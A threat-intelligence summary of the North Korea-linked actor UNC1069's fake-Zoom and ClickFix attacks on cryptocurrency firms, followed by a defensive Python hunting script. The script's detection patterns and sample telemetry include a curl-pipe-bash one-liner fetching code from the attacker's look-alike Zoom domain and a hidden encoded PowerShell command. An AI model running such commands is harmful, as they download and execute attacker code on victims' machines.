Full Report
The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft. "The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated
Analysis Summary
# Threat Actor: UNC1069
## Attribution & Identity
* **Primary Affiliation:** North Korea-linked threat actor.
* **Known Aliases:** CryptoCore, MASAN.
* **Activity Span:** Tracked as active since at least April 2018.
## Activity Summary
UNC1069 targets the cryptocurrency sector to steal sensitive data, with the ultimate goal of financial theft. Since at least 2023 its campaigns have shifted from traditional finance (TradFi) to the Web3 industry, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. The actor relies on social engineering built on compromised accounts, fake meeting set-ups, and AI-generated deceptive content. Kaspersky tracks the associated campaign under the name "GhostCall."
## Tactics, Techniques & Procedures
- **Social Engineering:** Initial contact from compromised Telegram accounts and fake Zoom meeting invites, with operators posing as venture capitalists or legitimate startup founders.
- **Lure Material Generation:** Reported use of generative AI tools (such as Gemini) to write lure messages and cryptocurrency-themed content.
- **Deceptive Media:** Deepfake images and video lures impersonating real people in the cryptocurrency industry.
- **Software Deception (Trojanized SDK):** Malware (e.g., the BIGMACHO backdoor) delivered disguised as a legitimate software development kit, specifically a Zoom SDK.
- **Infection Mechanism (ClickFix):** After the fake video call "fails" with a bogus error message, the victim is instructed to run a troubleshooting command; executing that command is what installs the malware.
- **Web Compromise/Phishing:** Meeting links redirect victims to look-alike sites masquerading as Zoom (e.g., `zoom.uswe05[.]us`, where "zoom" is only a subdomain label on an attacker-owned domain).
- **Recorded Call Footage Reuse:** Webcam footage of earlier victims is covertly recorded and replayed, alongside deepfakes, in later calls so that the "live" participants look genuine.
## Targeting
- **Sectors:** Cryptocurrency sector (Web3), Centralized Exchanges (CEX), software developers at financial institutions, high-technology companies, and venture capital funds.
- **Geography:** Not explicitly detailed in the summary, but targeting global financial/crypto entities.
- **Victims:** Individuals within the specified sectors.
## Tools & Infrastructure
- **Malware Families Deployed:** At least seven unique malware families, including the newly identified:
  - SILENCELIFT
  - DEEPBREATH
  - CHROMEPUSH
  - BIGMACHO (a backdoor delivered as a fake Zoom SDK)
- **Initial Access:** ClickFix (a "troubleshooting" command the victim is talked into running after a staged call failure).
- **Infrastructure:**
  - Fake Zoom website: `zoom.uswe05[.]us` (defanged)
  - Attacker-controlled storage for recorded webcam footage that is reused in later calls.
## Implications
UNC1069 demonstrates a high level of sophistication by folding generative AI (deepfake imagery and video, AI-written lure content, and reported use of AI for code development) into traditional but highly effective social engineering. Its persistent focus on the lucrative cryptocurrency/Web3 space reflects a financial motive and an adaptive tradecraft, and it poses a significant data theft and asset theft risk to organizations that handle sensitive digital assets.
## Mitigations
- **Vigilance on Cryptocurrency Lures:** Treat unsolicited contact about investment opportunities or technical troubleshooting, especially over Telegram, as suspect; a known contact's account may itself be compromised, so confirm the request out-of-band before acting on it.
- **Verify Meeting Environments:** Before joining, check that the meeting link's registrable domain is one Zoom actually owns (`zoom.uswe05[.]us` is not). Refuse any call that requires installing software or running a command to "fix" an error, or that shows unusual video streams or replayed segments.
- **Authentication for SDKs/Software:** Obtain SDKs and updates only from the vendor's official channels and verify their integrity; a Zoom SDK handed over during a meeting is how BIGMACHO was delivered.
- **Assume Compromise:** Unexpected webcam activity or system behaviour after such contact is a strong indicator of compromise. If a user ran a command or installed software at a caller's request, treat the host as compromised: isolate it, preserve the shell or PowerShell history, and rotate credentials and wallet keys reachable from that machine.
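The following hunting script is an added example written for this page; it is not code from the report, from Google/Mandiant, or from Kaspersky. It turns two observables from the TTP section above into checks that back the "Verify Meeting Environments" and "Assume Compromise" points: a meeting link whose "zoom" label sits on a domain Zoom does not own (the `zoom.uswe05[.]us` pattern), and a ClickFix-style command executed by the user after a staged call failure. The command-line patterns, the `explorer.exe` parent heuristic, the `ZOOM_DOMAINS` allow-list and the JSON-lines telemetry are all assumptions constructed for illustration; the report does not publish the exact command UNC1069 asked victims to paste, so these are generic ClickFix shapes rather than actor-specific indicators.

```python
"""Hunting heuristics for the GhostCall / UNC1069 chain: a look-alike Zoom
meeting link, then a ClickFix "run this troubleshooting command" prompt.
Added example, not code from the report; patterns and telemetry are assumed."""
import json
import re
from urllib.parse import urlparse

# Domains Zoom itself uses for meeting links (assumption: illustrative list,
# keep your own allow-list). Any other host carrying a "zoom" label is suspect.
ZOOM_DOMAINS = {"zoom.us", "zoom.com"}

# Generic ClickFix command shapes (assumed heuristics, not actor-specific IOCs).
CLICKFIX_PATTERNS = [
    ("ps-encoded-command", re.compile(
        r"\bpowershell(?:\.exe)?\b[^|]*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("ps-download-and-iex", re.compile(
        r"(?:\biex\b|invoke-expression)[^;|]*(?:\biwr\b|\birm\b|downloadstring)"
        r"|(?:\biwr\b|\birm\b|invoke-webrequest)[^|]*\|\s*(?:\biex\b|invoke-expression)",
        re.I)),
    ("mshta-remote", re.compile(r"\bmshta(?:\.exe)?\b\s+\S*https?://", re.I)),
    ("curl-pipe-shell", re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I)),
    ("base64-pipe-shell", re.compile(
        r"\bbase64\b\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b", re.I)),
    ("osascript-inline", re.compile(r"\bosascript\b\s+-e\s", re.I)),
]
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)
# Win+R paste leaves explorer.exe as the interpreter's parent (assumed heuristic).
RUN_DIALOG_PARENTS = {"explorer.exe"}


def refang(indicator: str) -> str:
    """Turn a defanged IOC (zoom.uswe05[.]us, hxxps://) back into a real URL."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def registrable_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels). Caveat: multi-label public suffixes such
    as co.uk break this; use a Public Suffix List library in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_fake_zoom_link(url: str) -> bool:
    """True for a 'zoom' label on a domain Zoom does not own (zoom.uswe05[.]us
    from the report); False for *.zoom.us / *.zoom.com and non-Zoom links."""
    host = (urlparse(refang(url)).hostname or "").lower()
    if not host or registrable_domain(host) in ZOOM_DOMAINS:
        return False
    return any("zoom" in label for label in host.split("."))


def analyze_event(ev: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means clean."""
    reasons = []
    if ev.get("type") == "web":
        url = ev.get("url", "")
        if is_fake_zoom_link(url):
            reasons.append(f"fake-zoom-link:{urlparse(refang(url)).hostname}")
        return reasons
    cmd = ev.get("cmdline", "")
    reasons += [name for name, pat in CLICKFIX_PATTERNS if pat.search(cmd)]
    for url in URL_RE.findall(cmd):
        if is_fake_zoom_link(url):
            reasons.append(f"fake-zoom-link:{urlparse(url).hostname}")
    # Corroborating signal only: a shell spawned from the Run dialog is common
    # for pasted ClickFix one-liners but also for ordinary shortcuts.
    if reasons and ev.get("parent", "").lower() in RUN_DIALOG_PARENTS:
        reasons.append(f"run-dialog-parent:{ev['parent'].lower()}")
    return reasons


def hunt(jsonl: str) -> list:
    """Run the heuristics over JSON-lines telemetry and return only the hits."""
    hits = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            reasons = analyze_event(ev)
            if reasons:
                hits.append({"id": ev["id"], "host": ev.get("host"), "reasons": reasons})
    return hits


# Constructed sample telemetry (no real victim data; base64 blob is a placeholder).
SAMPLE_EVENTS = r"""
{"id": 1, "host": "mac-dev-01", "type": "process", "parent": "Terminal", "image": "/bin/zsh", "cmdline": "git status"}
{"id": 2, "host": "mac-dev-01", "type": "process", "parent": "Terminal", "image": "/bin/bash", "cmdline": "bash -c 'curl -fsSL https://zoom.uswe05.us/fix.sh | bash'"}
{"id": 3, "host": "win-vc-07", "type": "process", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -w hidden -enc SQBFAFgAIAAuAC4ALgA="}
{"id": 4, "host": "win-vc-07", "type": "process", "parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\backup.ps1"}
{"id": 5, "host": "win-vc-07", "type": "web", "url": "https://us05web.zoom.us/j/123456789"}
{"id": 6, "host": "win-vc-07", "type": "web", "url": "https://zoom.uswe05.us/j/987654321"}
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Run against the constructed events, the script flags the macOS `curl | bash` one-liner fetching from the look-alike domain, the encoded PowerShell launched from the Run dialog, and the browser visit to `zoom.uswe05.us`, while leaving the ordinary `git status`, the scripted backup and the genuine `us05web.zoom.us` visit alone. Two design points matter in practice: the domain check works on the registrable domain rather than on substring matching, so a legitimate `*.zoom.us` host never trips it, and the `explorer.exe` parent is used only as a corroborating signal, because on its own it also describes a user double-clicking a shortcut.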